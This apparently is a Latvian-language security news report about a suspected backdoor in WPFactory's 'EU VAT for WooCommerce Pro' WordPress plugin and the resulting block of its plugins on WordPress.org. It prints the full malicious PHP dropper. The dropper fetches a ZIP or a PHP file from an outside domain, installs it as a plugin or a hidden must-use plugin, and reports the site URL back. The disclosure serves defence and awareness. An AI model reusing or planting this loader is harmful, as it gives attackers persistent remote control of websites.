Drošības pārkāpums vietnē WPFactory: apdraudētas 170 000 WordPress vietnes

| Ziņas |

WordPress joprojām ir visplašāk izmantotā satura vadības sistēma pasaulē, nodrošinot vairāk nekā 40 procentus visām tīmekļa vietnēm internetā. Sākot ar mazo uzņēmumu vietnēm un personīgajiem emuāriem, līdz pat lielām uzņēmumu platformām un e-komercijas infrastruktūrai, CMS ir kļuvis par moderno tīmekļa mugurkaulu. Tās popularitāte izriet no tās elastības, atvērtās ekosistēmas un milzīgā spraudņu skaita, kas pieejami tās funkcionalitātes paplašināšanai.

Tomēr šī pati ekosistēma ir kļuvusi arī par vienu no lielākajiem WordPress drošības izaicinājumiem.

Uzņēmumā Ferber Enterprises mūsu kiberdrošības komanda nepārtraukti uzrauga draudus, kas ietekmē WordPress ekosistēmu, jo ievainojamības spraudņos, tēmās vai piegādes ķēdēs var ātri pāraugt plaša mēroga drošības pārkāpumos, kas skar tūkstošiem tīmekļa vietņu visā pasaulē. Pēdējos gados uzbrucēji arvien biežāk vēršas pret spraudņu izstrādātājiem un izplatīšanas infrastruktūrām, nevis pret atsevišķām tīmekļa vietnēm, tādējādi ļaujot ļaunprātīgam kodam izplatīties caur uzticamiem programmatūras atjauninājumiem un oficiāliem lejupielādes kanāliem.

Šonedēļ izcēlās liela skandāla, kurā iesaistījās WPFactory — pazīstams WordPress spraudņu izstrādātājs, kura produkti ir instalēti vairāk nekā 170 000 tīmekļa vietnēs visā pasaulē. Vairāk nekā 80 ar šo uzņēmumu saistīti spraudņi tika uz laiku bloķēti vietnē WordPress.org, pēc tam, kad mūsu kiberdrošības komanda Ferber Enterprises atklāja iespējamu aizmugurējo durvju programmu viena no šī uzņēmuma spraudņu premium versijā.

Incidents ir radījis nopietnas bažas visā WordPress kopienā par programmatūras piegādes ķēžu drošību, spraudņu pārskatīšanas procesiem un uzbrukumu pieaugošo sarežģītību, kas vērstas pret atvērtā pirmkoda ekosistēmu.

Aizdomīgās spraudņa uzvedības atklāšana

Šī problēma pirmo reizi tika atklāta pēc tam, kad mūsu kiberdrošības komanda Ferber Enterprises, testējot plugina „EU VAT for WooCommerce Pro“ premium versiju, kas tiek izplatīta tieši no tā oficiālās tīmekļa vietnes, konstatēja neparastu darbību.

Sākotnēji izmeklēšana sākās pēc tam, kad spraudnis instalēšanas laikā radīja fatālu kļūdu. Risinot problēmu, mūsu analītiķi identificēja aizdomīgu PHP failu ar nosaukumu class-alg-wc-eu-vat-customer.php. Šķita, ka fails veic darbības, kas pilnībā neatbilst WooCommerce PVN spraudņa paredzētajai funkcionalitātei.

class-alg-wc-eu-vat-customer.php 
<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Saskaņā ar mūsu analīzi, kods mēģināja:

  • Lejupielādēt ārēju ZIP arhīvu no attālā servera
  • Mainīt WordPress kodola direktorijus
  • Sazināties ar ārējo infrastruktūru
  • Potenciāli izpildīt attālinātus uzbrukumus inficētajās tīmekļa vietnēs

Šie rādītāji nekavējoties lika aizdomas par iespējamu slēptu aizmugurisko durvju esamību vai ļaunprātīgu piegādes ķēdes kompromitēšanu.

Situāciju īpaši satraucošu padarīja tas, ka spraudnis nebija iegūts no neoficiāla spoguļservera vai pirātiska repozitorija. Pakete tika lejupielādēta tieši no WPFactory oficiālā klientu portāla, kas pastiprināja bažas, ka varētu būt kompromitēts pats izplatīšanas kanāls.

Uzņēmumā Ferber Enterprises mēs nekavējoties dokumentējām šo incidentu un uzsākām atbildīgas informācijas izpaušanas procesu, sazinoties ar WPFactory tieši caur GitHub.

Sākotnējā atbilde no WPFactory

Sākotnēji WPFactory atbildēja, norādot, ka ziņojumā aprakstītais aizdomīgais fails un darbības nav daļa no viņu oficiālās kodbāzes.

Uzņēmuma pārstāvis ierosināja vairākus alternatīvus skaidrojumus, tostarp:

  • Modificēta lokālā instalācija
  • Apšaubīta tīmekļa vietnes vide
  • Vecmodināta spraudņa versija
  • Potenciāli safabricēts lejupielādes avots

Uzņēmums arī norādīja, ka nevarēja droši pārbaudīt iesniegto ZIP failu, jo viņu pārlūkprogramma atzīmēja arhīvu kā potenciāli nedrošu.

Mūsu kiberdrošības komanda vēlāk precizēja, ka spraudnis bija lejupielādēts tieši no WPFactory oficiālās tīmekļa vietnes un ka aizdomīgais fails palika sistēmā pat pēc tam, kad no tā paša avota tika lejupielādēta jauna versija 4.6.1.

Šis fakts kļuva par izmeklēšanas galveno elementu. Ja vairākas neatkarīgas lejupielādes no oficiālā izplatīšanas kanāla pastāvīgi saturēja to pašu aizdomīgo kodu, iespēja, ka ir notikusi vietējās tīmekļa vietnes kompromitēšana, kļuva arvien mazāk ticama. Neskatoties uz šiem atklājumiem, WPFactory sākotnēji paziņoja, ka viņiem nav izdevies atkārtot šo problēmu savā pusē, un apgalvoja, ka aizdomīgais fails oficiālajā spraudņa paketē nepastāv.

Tad uzņēmums lūdza administratora un FTP piekļuvi skartajai videi, lai turpinātu izmeklēšanu. Mēs, Ferber Enterprises, noraidījām šo lūgumu kiberdrošības apsvērumu dēļ. Privilēģētas piekļuves piešķiršana serverim piegādātājam, kura infrastruktūra, iespējams, pati bija kompromitēta, būtu radījusi nepieņemamu drošības risku. Tā vietā mūsu komanda turpināja sniegt tehniskos pierādījumus, tostarp video demonstrāciju, kurā redzama aizdomīga spraudņa darbība uzreiz pēc instalēšanas.

Eskalācija uz WordPress.org

Izmeklēšanas gaitā pieauga bažas par šīs problēmas iespējamo apmēru. WPFactory uztur plašu spraudņu klāstu, kas sastāv no vairāk nekā 65 spraudņiem ar kopumā vairāk nekā 170 000 aktīvu instalāciju. Tādējādi jebkāds uzbrukums, kas ietekmētu uzņēmuma izplatīšanas infrastruktūru, varētu radīt plašas sekas visā WordPress ekosistēmā.

Mūsu komanda par šo problēmu nekavējoties informēja WordPress.org, lai novērstu situāciju, ka citi lietotāji instalētu potenciāli kompromitētus pakotnes, kamēr izmeklēšana vēl turpinājās. Pēc tam WordPress.org veica ārkārtas pasākumu, uz laiku bloķējot vairāk nekā 80 WPFactory spraudņus oficiālajā repozitorijā.

Šis solis uzreiz piesaistīja WordPress drošības kopienas uzmanību, jo tik liela mēroga masveida spraudņu slēgšana ir salīdzinoši reta parādība un parasti liecina par nopietnām, neatrisinātām problēmām. Pēc situācijas saasināšanās WPFactory vēlāk atzina, ka problēma šķita pamatota, un atvainojās par to, ka nebija reaģējusi ātrāk uz sākotnējo ziņojumu. Uzņēmuma pārstāvji paziņoja, ka viņi aktīvi izmeklē šo jautājumu un strādā pie risinājuma. Viena no WPFactory iekšēji izvirzītajām hipotēzēm liecināja, ka caur viņu infrastruktūru varētu būt netīšām izplatīts novecojis vai kešēts spraudņu pakotnes.

Tomēr mūsu kiberdrošības komanda nepiekrita šim vērtējumam. Novērotā uzvedība stingri norādīja uz dziļāku drošības problēmu, kas potenciāli ietver kompromitētas izstrādes caurules, izplatīšanas sistēmas vai neatļautu koda injicēšanu lejupielādējamo spraudņu arhīvos.

Kāpēc šis incidents ir svarīgs

WPFactory skandāls liecina par pieaugošu kiberdrošības apdraudējumu, kas pazīstams kā programmatūras piegādes ķēdes uzbrukums. Tradicionāli uzbrucēji koncentrējās uz atsevišķu tīmekļa vietņu kompromitēšanu, izmantojot bruto spēka uzbrukumus vai spraudņu ievainojamības. Šodien ļaunprātīgie aktori arvien biežāk vēršas pret pašu programmatūras izstrādātājiem, jo uzticama piegādātāja kompromitēšana ļauj ļaunprātīgajam kodam vienlaikus izplatīties tūkstošiem tīmekļa vietņu.

Šī stratēģija jau ir novērota vairākos augsta līmeņa kiberdrošības incidentos, kas pēdējās desmitgades laikā ir ietekmējuši globālās programmatūras ekosistēmas. Konkrēti WordPress ekosistēmā spraudņu izstrādātāji ir pievilcīgi mērķi, jo administratori pēc būtības uzticas spraudņiem un tie bieži vien darbojas ar paaugstinātām atļaujām.

Ja ļaunprātīgs kods tiek ievietots spraudņa paketē, kas tiek izplatīta caur oficiālu kanālu, skartās tīmekļa vietnes var neapzināti pašas instalēt ļaunprogrammatūru. Attiecībā uz aizdomīgo spraudni „WPFactory“ iespējamās sekas ir nopietnas.

Pamatojoties uz mūsu analīzi, konstatētā darbība teorētiski varētu ļaut uzbrucējiem:

  • Izvietot papildu ļaunprogrammatūru
  • Inject SEO spam
  • Izveidojiet pastāvīgas aizmugures durvis
  • Nekavējoties izvilkt sensitīvus datus
  • Modificēt WordPress instalācijas attālināti
  • Uzturēt neatļautu piekļuvi ilgstoši

Šādu uzbrukumu bīstamība slēpjas to slēptībā. Mūsdienu aizmugures durvis bieži ir izstrādātas tā, lai pirms aktivizēšanās tās mēnešiem ilgi darbotos neaktīvi, tādējādi ievērojami apgrūtinot noteikšanu. Šī mēneša sākumā WordPress spraudņu komanda, kā ziņots, bloķēja vairāk nekā 30 spraudņus pēc tam, kad citā spraudņu portfelī paslēptais ļaunprātīgais kods astoņus mēnešus palika neaktīvs, pirms beidzot aktivizējās un ievietoja SEO spamu tīmekļa vietnēs.

Šī tendence parāda, kā uzbrucēji arvien vairāk piešķir prioritāti noturībai un aizkavētai aktivizēšanai, lai apietu noteikšanas mehānismus.

Plašāka drošības krīze WordPress ekosistēmā

WPFactory incidents atklāj arī plašākas sistēmiskas drošības problēmas, kas skar WordPress kopumā. Pēdējās desmitgades laikā spraudņu ekosistēma ir strauji paplašinājusies, un gan oficiālajos, gan komerciālajos tirgos tagad ir pieejami desmitiem tūkstošu spraudņu. Lai gan šī ekosistēma veicina inovācijas un elastīgumu, tā vienlaikus ievērojami apgrūtina drošības uzraudzību.

Saskaņā ar Patchstack ziņojumu “WordPress drošības stāvoklis 2026. gadā” gandrīz 461 000 zināmu ievainojamību netika novērstas pirms to publiskas atklāšanas. Šie statistikas dati atspoguļo arvien pieaugošo slogu, kas gulstas gan uz spraudņu izstrādātājiem, gan drošības pētniekiem, gan repozitoriju uzturētājiem.

Tajā pašā laikā oficiālais WordPress spraudņu pārskatīšanas rinda, kā ziņots, tagad pārsniedz 4000 spraudņu, kas gaida izskatīšanu. Šādi skaitļi parāda milzīgo izaicinājumu kvalitātes nodrošināšanas un drošības audita uzturēšanā plašā mērogā.

Daudzi spraudņu izstrādātāji ir nelielas komandas ar ierobežotiem drošības resursiem. Citi vienlaikus pārvalda desmitiem spraudņu, īstenojot agresīvas komerciālās izaugsmes stratēģijas, kas ietver uzņēmumu pārņemšanu un produktu klāsta paplašināšanu. Arī pats WPFactory nesen paplašinājās, veicot pārņemšanas, tostarp 2025. gadā iegādājoties Extend-WP un tā 19 spraudņus, kam vēlāk tajā pašā gadā sekoja WBW un vairāku citu spraudņu pārņemšana.

Strauja portfeļa paplašināšanās var radīt operatīvu sarežģītību, kas apgrūtina koda auditu, infrastruktūras pārvaldību un izlaiduma integritātes pārbaudi. Uzbrucēji ir pilnībā informēti par šīm realitātēm. Viņi arvien biežāk koncentrējas uz vājiem operatīvās drošības principiem programmatūras piegādātāju vidū, nevis tieši uz galalietotājiem.

Piegādes ķēdes drošības pieaugošā nozīme

Šādi incidenti pastiprina steidzamo vajadzību pēc spēcīgākas piegādes ķēdes drošības prakses visā WordPress ekosistēmā.

Uzņēmumā Ferber Enterprises mūsu kiberdrošības komanda stingri iesaka spraudņu izstrādātājiem ieviest vairākus būtiskus aizsardzības pasākumus, tostarp:

  • Kriptogrāfiskā pakotņu parakstīšana
  • Drošas CI/CD cauruļvadi
  • Obligātā daudzfaktoru autentifikācija
  • Infrastruktūras segmentācija
  • Nepārtraukta integritātes uzraudzība
  • Neatkarīgas koda auditi
  • Reproducējamas būvēšanas sistēmas

Vietņu administratoriem vajadzētu arī stiprināt savu drošības stāvokli. Pat spraudņus, kas lejupielādēti no oficiāliem vai uzticamiem avotiem, nevajadzētu uzskatīt par pašsaprotami drošiem.

Organizācijām, kas pārvalda kritiskas WordPress infrastruktūras, būtu jāapsver:

  • Staging vides uzturēšana
  • Ienākošās datplūsmas uzraudzība
  • Skenēšanas spraudņi pirms izvietošanas
  • Spraudņu lietošanas ierobežošana
  • Vismazākās privilēģijas piekļuves kontroles piemērošana
  • Failu integritātes uzraudzības ieviešana
  • Izmantojot pārvaldītus Web Application Firewalls (WAF)

Kolektīvajos uzņēmumos piegādes ķēdes validācija kļūst tikpat svarīga kā tradicionālā drošības risku pārvaldība. Pieņēmums, ka oficiālie programmatūras kanāli vienmēr ir droši, mūsdienu draudu vidē vairs nav reālistisks.

Sabiedrības reakcijas un turpinās izmeklēšana

Domstarības plaši izplatījās visā WordPress kopienā pēc tam, kad izstrādātāji, drošības pētnieki un infrastruktūras nodrošinātāji publiski sāka apspriest šo jautājumu.

Vairākas pazīstamas personas ekosistēmā veicināja situācijas apzināšanos, tostarp izstrādātāji, kuri publicēja pagaidām slēgto spraudņu sarakstus un mudināja administratorus auditēt savas vides.

Tikmēr mūsu komanda Ferber Enterprises turpina analizēt aizdomīgos spraudņu paraugus un meklēt papildu kompromitācijas pazīmes, kas varētu ietekmēt WordPress vietnes visā pasaulē.

Līdz publikācijas brīdim uzņēmums WPFactory ir atzinis šo problēmu un paziņojis, ka aktīvi strādā pie tās risināšanas.

Tomēr daudzi jautājumi joprojām paliek neatbildēti:

  • Vai tika kompromitēta oficiālā izplatīšanas infrastruktūra?
  • Cik ilgi potenciāli tika izplatīti ļaunprātīgi pakotnes?
  • Vai tas skāra arī citus spraudņus?
  • Vai tika uzlauzti klientu konti vai lejupielādes sistēmas?
  • Vai uzbrucēji ieguva pastāvīgu piekļuvi iekšējai infrastruktūrai?
  • Vai papildu dīkstāvoši vai rezerves dzinēji vēl varētu pastāvēt?

Kamēr šie jautājumi nav pilnībā atrisināti, joprojām ir jāievēro piesardzība.

WordPress drošības nākotne

WPFactory incidents varētu kļūt par vēl vienu spilgtu piemēru kiberdrošības problēmām, ar kurām saskaras atvērtā koda tīmekļa ekosistēma.

WordPress darbinapūš milzīgu daļu no globālās interneta ekonomikas. Jebkurš liela mēroga kompromiss, kas ietekmē spraudņu izstrādātājus, tāpēc var radīt sekas, kas sniedzas daudz tālāk par atsevišķām vietnēm.

Tā kā uzbrucēji arvien vairāk pievēršas piegādes ķēdes kompromitēšanai un slēptām ilgtermiņa ietekmes metodēm, spraudņu drošību vairs nevar uzskatīt par sekundāru jautājumu. Mēs, Ferber Enterprises, uzskatām, ka šis notikums ir būtisks atgādinājums par to, ka kiberdrošība nozīmē ne tikai pašu tīmekļa vietņu aizsardzību, bet arī katra programmatūras izplatīšanas ķēdes posma drošības nodrošināšanu.

Uzticēšanās atvērtām ekosistēmām ir atkarīga no caurspīdīguma, ātras reaģēšanas uz incidentiem un stingrām operatīvās drošības praksēm. WordPress ekosistēma tagad saskaras ar nozīmīgu brīdi.

Tas, kā izstrādātāji, repozitoriju uzturētāji, hostingu nodrošinātāji un drošības komandas reaģēs uz šādiem incidentiem, noteiks, vai WordPress varēs saglabāt uzticību miljoniem uzņēmumu un organizāciju, kas uz to paļaujas ik dienas.